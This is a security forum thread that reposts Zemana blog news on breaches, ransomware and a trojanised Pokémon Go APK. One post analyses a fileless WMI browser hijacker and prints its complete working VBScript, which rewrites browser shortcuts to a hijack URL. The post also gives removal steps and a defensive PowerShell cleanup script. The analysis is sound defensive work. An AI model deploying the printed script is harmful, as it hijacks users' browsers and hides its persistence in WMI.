Zemana Blog News Update

Discussion in 'Zemana' started by jasonX, Jul 10, 2016.

  1. jasonX

    jasonX Giveaways Moderator Staff Member



    Nearly 150,000 user data hacked from dating site “Muslim Match”


    Amina Zilic of Zemana Ltd. shares her news (lifted) from Zemana's Blog about the data theft leakage and how we can learn from it. In the future she will also update us from the Zemana Blog directly.

    150,000 users’ credentials and passwords on the dating site “Muslim Match” were hacked and 700,000 private messages between users were posted online.

    The Muslim Match site is a free site that people from around the world could join to connect with others in order to share experiences, ideas, personal thoughts and information, with the aim of finding a perfect and suitable match for themselves.

    Source

    Related Info HERE
     
    LowcyGier and dinosaur07 like this.
  3. Argerra

    Argerra Zemana Developer


    Recently, we discovered a browser hijacker altering shortcuts by inserting an http://yeabests.cc argument. When you open your browser, instead of your favorite search engine, you will be presented with this one:


    This is nothing new when it comes to browser hijacking, I would say it's a well-known trick, but I was fascinated by how this malware works and the idea they came up with to stay undetected by altering your shortcuts over and over again after cleaning.

    This so-called fileless malware lives inside WMI (Windows Management Instrumentation), or more precisely, as a Visual Basic script inside an ActiveScriptEventConsumer class instance.

    The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder at %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect, since it uses the not-so-common WMI application scrcons.exe rather than the traditional JS application wscript.exe.

    The Windows built-in application wbemtest.exe or WMIExplorer can be used to access this script.


    Below is the content of VBScript used to hijack browsers:

    ' Script body stored in the ActiveScriptEventConsumer instance
    Dim objFS
    Set objFS = CreateObject("Scripting.FileSystemObject")
    On Error Resume Next
    Const link = "http://yeabests.cc"
    ' Browser executables whose shortcuts get the hijack argument
    browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
    Set BrowserDic = CreateObject("scripting.dictionary")
    For Each browser In browsers
        BrowserDic.Add LCase(browser), browser
    Next
    ' Shortcut folders that get scanned (note the hard-coded user profile path)
    Dim FoldersDic(12)
    Set WshShell = CreateObject("Wscript.Shell")
    FoldersDic(0) = "C:\Users\Public\Desktop"
    FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
    FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
    FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    FoldersDic(4) = "C:\Users\Rafael\Desktop"
    FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
    FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
    FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
    FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
    FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
    FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
    Set fso = CreateObject("Scripting.Filesystemobject")
    For i = 0 To UBound(FoldersDic)
        For Each file In fso.GetFolder(FoldersDic(i)).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                ' Only shortcuts whose target is one of the listed browsers are touched
                If BrowserDic.Exists(LCase(name)) Then
                    oShellLink.Arguments = link
                    ' Clear the read-only attribute (bit 1) so the shortcut can be saved
                    If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                    End If
                    oShellLink.Save
                End If
            End If
        Next
    Next
    ' Terminate the WMI script host once the run is done
    createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

    As you can see, the malware is able to hijack 14 different browsers by checking their executables:
    IEXPLORE.EXE
    chrome.exe
    firefox.exe
    360chrome.exe
    360SE.exe
    SogouExplorer.exe
    opera.exe
    Safari.exe
    Maxthon.exe
    TTraveler.exe
    TheWorld.exe
    baidubrowser.exe
    liebao.exe
    QQBrowser.exe

    Zemana AntiMalware removes this malware and cleans altered shortcuts.


    Manual removal

    The manual removal of this malware isn't hard at all.

    • Press Windows button + R on your keyboard at the same time. Type wbemtest and click OK.

    • Windows Management Instrumentation Tester window will open. Click Connect.

    • Type root\subscription exactly like on the image below:



    • Click Open Class on the next window and type ActiveScriptEventConsumer.


    • Now you need to click Instances.


    • And then to finally remove this malware:

    The only thing left is to remove the argument from your browser shortcuts.
    • Right click on the desired shortcut and select Properties.
    • Remove the http://yeabests.cc argument after "
    • Click OK to apply the changes.

    Save yourself the hassle and install Zemana AntiMalware.


    Additional Information:
    Md5: a718bf376567abd3e7de06f31b036405
    VirusTotal: Yeabests installer

    Resources:
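    A defender-side check for the two things this post describes, the script consumer living in root\subscription and the shortcuts it rewrites, as an added PowerShell example (not Zemana's code and not part of the original post). It lists every __EventFilter, __FilterToConsumerBinding and ActiveScriptEventConsumer in root\subscription, flags consumers whose script text contains the hijacker's URL, and then walks the same kinds of shortcut folders the script walks, generalised to every profile under C:\Users instead of one hard-coded user, looking for .lnk files that carry the argument. The $Indicator string and the folder layout come from the post; the function names, the $Remove switch and the report format are assumptions of this example. It expects an elevated Windows PowerShell 5.1 session (Get-WmiObject / Remove-WmiObject).

```powershell
# Added example (not from the post or from Zemana): audit WMI script-consumer
# persistence and browser shortcuts for the yeabests.cc hijacker.
# Assumption: run from an elevated Windows PowerShell 5.1 session.
$Indicator = 'http://yeabests.cc'   # string taken from the post
$Remove    = $false                 # $false = report only, $true = clean up

function Find-WmiScriptPersistence {
    param([string]$Pattern, [bool]$Clean)
    $ns = 'root\subscription'
    $rx = [regex]::Escape($Pattern)

    # Filters are the trigger, consumers the payload, bindings tie them together;
    # list all three so an unexpected entry stands out even if the URL changed.
    Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue |
        ForEach-Object { "Filter   : $($_.Name)  Query: $($_.Query)" }
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue |
        ForEach-Object { "Binding  : $($_.Filter) -> $($_.Consumer)" }

    Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object {
            $consumer = $_
            $hit = $consumer.ScriptText -match $rx
            "Consumer : $($consumer.Name)  Engine: $($consumer.ScriptingEngine)  Suspicious: $hit"
            if ($hit -and $Clean) {
                # Bindings reference the consumer by object path; drop them first, then the
                # consumer itself (the equivalent of deleting the instance in wbemtest).
                Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
                    Where-Object { $_.Consumer -match [regex]::Escape($consumer.Name) } |
                    Remove-WmiObject
                $consumer | Remove-WmiObject
                "Removed  : consumer $($consumer.Name)"
            }
        }
}

function Find-HijackedShortcuts {
    param([string]$Pattern, [bool]$Clean)
    $rx  = [regex]::Escape($Pattern)
    $wsh = New-Object -ComObject WScript.Shell

    # Same locations the hijacker walks, but for every profile instead of one user.
    $roots = @("$env:PUBLIC\Desktop", "$env:ProgramData\Microsoft\Windows\Start Menu")
    foreach ($userDir in Get-ChildItem "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue) {
        $roots += "$($userDir.FullName)\Desktop"
        $roots += "$($userDir.FullName)\AppData\Roaming\Microsoft\Windows\Start Menu"
        $roots += "$($userDir.FullName)\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
    }

    foreach ($root in ($roots | Where-Object { Test-Path $_ })) {
        Get-ChildItem -Path $root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
            ForEach-Object {
                $lnk = $wsh.CreateShortcut($_.FullName)
                if ($lnk.Arguments -match $rx) {
                    "Hijacked : $($_.FullName)  Target: $($lnk.TargetPath)  Args: $($lnk.Arguments)"
                    if ($Clean) {
                        $lnk.Arguments = ($lnk.Arguments -replace $rx, '').Trim()
                        # The hijacker clears the read-only bit before saving; so must we.
                        if ($_.IsReadOnly) { $_.IsReadOnly = $false }
                        $lnk.Save()
                        "Cleaned  : $($_.FullName)"
                    }
                }
            }
    }
}

# scrcons.exe is the host the consumer's script runs in; the sample kills it
# after each pass, so a live instance is worth noting in the report.
if (Get-Process -Name scrcons -ErrorAction SilentlyContinue) { "Note     : scrcons.exe is currently running" }
Find-WmiScriptPersistence -Pattern $Indicator -Clean $Remove
Find-HijackedShortcuts    -Pattern $Indicator -Clean $Remove
```

    With $Remove left at $false the script only reports, which is the right first run: compare the listed filters and bindings against what you expect on the machine before deleting anything. Setting it to $true performs the same two actions as the manual steps above, deleting the binding and consumer from root\subscription and stripping the argument from each affected shortcut.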

     
  4. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Hello -Argerra-!!

    Thanks for this information!! :)
     
    LowcyGier and jasonX like this.
  5. Argerra

    Argerra Zemana Developer

    No problem at all:))
     
    LowcyGier and jasonX like this.
  6. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    And welcome to TbT!! :D
     
    LowcyGier and jasonX like this.
  7. Argerra

    Argerra Zemana Developer

    Thank you:)
     
    LowcyGier likes this.
  8. Argerra

    Argerra Zemana Developer

    Android users are at risk since Pokemon Go, a worldwide known app, has a malicious version.

    The game is created by Niantic and it takes users out into the real world by using geo-markers scanned with their phone's camera to "find" Pokémon in the wild.

    The popularity of this app is so high that it can even pair with Twitter in terms of daily active users.

    It was discovered that there is a malicious version of the app that was modified in order to include the malicious remote access tool (RAT) known as DroidJack, which gives the attackers the possibility to fully control the victim’s phone. In less than 72 hours the malicious APK was already uploaded to the malicious file repository.

    What caused this to happen? Read more here.
     
    LowcyGier, guardian and jasonX like this.
  9. jasonX

    jasonX Giveaways Moderator Staff Member

    Hello Argerra,

    Thanks for posting an update from your Zemana Blog! Welcome to Tweakbytes!!!! The team is happy you are here :)

    jasonX

     
    LowcyGier likes this.
  10. jasonX

    jasonX Giveaways Moderator Staff Member

    GREAT INFO there!!!

    Thanks very much!


     
    LowcyGier and guardian like this.
  11. guardian

    guardian Administrator Staff Member

    Hi Argerra, it is my honour to be able to welcome you to our forum. Just about to head off to work, but I plan to read your threads more closely when I get home this arvo. They definitely are a MUST READ. Thank you for joining TBT, and thank you jasonX for introducing us to Argerra.
     
  12. dinosaur07

    dinosaur07 Senior Member

    Hello Argerra, thanks a lot for the updates and workarounds you presented us. We will be at least better informed and of course protected. I'm a user of ZAM and I'm very interested in all the new "net nasties" floating in the cyberspace. :cool:
     
    LowcyGier, jasonX and guardian like this.
  13. guardian

    guardian Administrator Staff Member

    checked mine and did manual search and all came back clean
     
    LowcyGier, Argerra and jasonX like this.
  14. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Did the manual check, as well, and much to my joy....that nasty thing was not there. :)

    Running a ZAM Smart Scan, as well. And that malware was not detected by ZAM, either!! :)
     
  15. jasonX

    jasonX Giveaways Moderator Staff Member


    Pokémon Go catches all your personal data

    Amina Zilic of Zemana Ltd., shares her news (lifted) from Zemana's Blog about the data leakage attributed to the latest craze Pokémon Go

    While you catch Pokémon creatures, Pokémon Go catches a lot of your personal information.

    Source


    Source Reference HERE
     
    LowcyGier and BC2Tweak like this.
  16. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Good to know!! :)

    However, I've no interest in Pokemon Go (in any way, manner, shape or form), so I don't have to worry about the data leakage problems. :)
     
    LowcyGier likes this.
  17. jasonX

    jasonX Giveaways Moderator Staff Member

    Zemana AntiMalware scores FIRST in MRG's In-the-wild Ransomware Protection Comparative Analysis 2016


    Zemana AntiMalware has just placed FIRST in the latest MRG Effitas In-the-wild Ransomware Protection Comparative Analysis 2016 Q3, besting, among others, Malwarebytes Anti-Ransomware, CryptoPrevent, HitmanPro.Alert and Bitdefender Anti-Ransomware!!!

    To quote directly from the report,

    1.4 Executive summary
    We tested the ransomware protection tools against eleven different ransomware, which have been prevalent in-the-wild over the past 3-4 years. First, we installed the protection tool into the system, then started the ransomware (or ransomware dropper), and when the ransomware process exited (or was killed), we scanned the system for the presence of encrypted files.



    Based on this report, Zemana AntiMalware proved to be the best ransomware protection among the tested products during the test. These scores are not normalized with the prevalence of the ransomware samples. Usually, the most prevalent samples are included in these generic protections, but as always, life (and IT Security) is never simple.


    More Info can be found HERE

    Zemana Blog report about the MRG result HERE
     
    LowcyGier, Gdant, BC2Tweak and 2 others like this.
  18. jasonX

    jasonX Giveaways Moderator Staff Member


    Server hosting Cerber ransomware campaign shuts down

    Amina Zilic of Zemana Ltd. shares her news (lifted) from Zemana's Blog about the ransomware campaign detected by FireEye.

    Do you remember just last month that corporate Office 365 users were targeted with malicious emails? Well, that was a part of the overall Cerber ransomware campaign, whose servers are now shut down.

    According to a blog post written by two researchers from FireEye, the server used in the Cerber ransomware campaign has been shut down through the efforts of FireEye, the Computer Emergency Response Team in the Netherlands (CERT-Netherlands), and web hosting companies.


    Source

    References HERE

    Cerber Ransomware Info HERE
     
  19. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    Very cool!! :)
     
    LowcyGier likes this.
  20. Gdant

    Gdant Senior Member Known Member

    Zemana Anti-malware is best of its kind:) but I am seriously missing their second product too (Zemana Anti-logger).:p
    Will anti-logger be supported in future?o_O
     
    LowcyGier and jasonX like this.
  21. jasonX

    jasonX Giveaways Moderator Staff Member


    Avoid and defeat ransomware by applying these must-have tips

    Amina Zilic of Zemana Ltd. shares her news (lifted) from Zemana's Blog about how to avoid/defeat this scourge, "ransomware".

    Ransomware – if the word itself sounds so terrible, imagine then the consequences of a ransomware attack.

    We all know that once you get infected with ransomware your sensitive data gets encrypted and attackers demand some form of payment to decrypt it.


    Zemana Blog Source HERE
     
    LowcyGier, frogboy and BC2Tweak like this.
  22. jasonX

    jasonX Giveaways Moderator Staff Member

    --Forwarded your query to Argerra :)
     
    LowcyGier and Gdant like this.
  23. Gdant

    Gdant Senior Member Known Member

    thanks jasonX:)
     
    LowcyGier likes this.
  24. Argerra

    Argerra Zemana Developer

    Hi Gdant,

    We are glad that you like both of our products and Zemana AntiLogger will be supported in the future. Stay tuned:)
     
    LowcyGier, frogboy and Gdant like this.
  25. Gdant

    Gdant Senior Member Known Member

    I came to know that the new anti-logger will have the same type of UI that Zemana anti-malware has..;)
    Can't wait to be the beta tester for it!!:D
    I will be happy to join if it is there:)
     
    LowcyGier likes this.
  26. BC2Tweak

    BC2Tweak Reviews Moderator Staff Member

    And not only backup, but have good protection in place to begin with!! :)

    I am very happy to be using both Zemana AntiMalware and AntiLogger, because they are superb security products. I've used AntiLogger longer than ZAM, because I wasn't aware of ZAM until earlier last year. I do use other security products, as well. Both products work exceptionally well and do not hog System Resources. They are also not complicated to use (i.e. very user-friendly). Some security products that I have used or am using, are a little more complicated to use, and are especially user-friendly, however, that does mean they are not exceptional products. I do look for user-friendliness in a product that I am reviewing, as I look from the user's POV. :)

    All of the above was for free.... :D

    I'd really also appreciate the opportunity to do some more Beta Testing for Zemana. Was very happy to help them with the ZAM Product. :)
     
    LowcyGier, Gdant and frogboy like this.
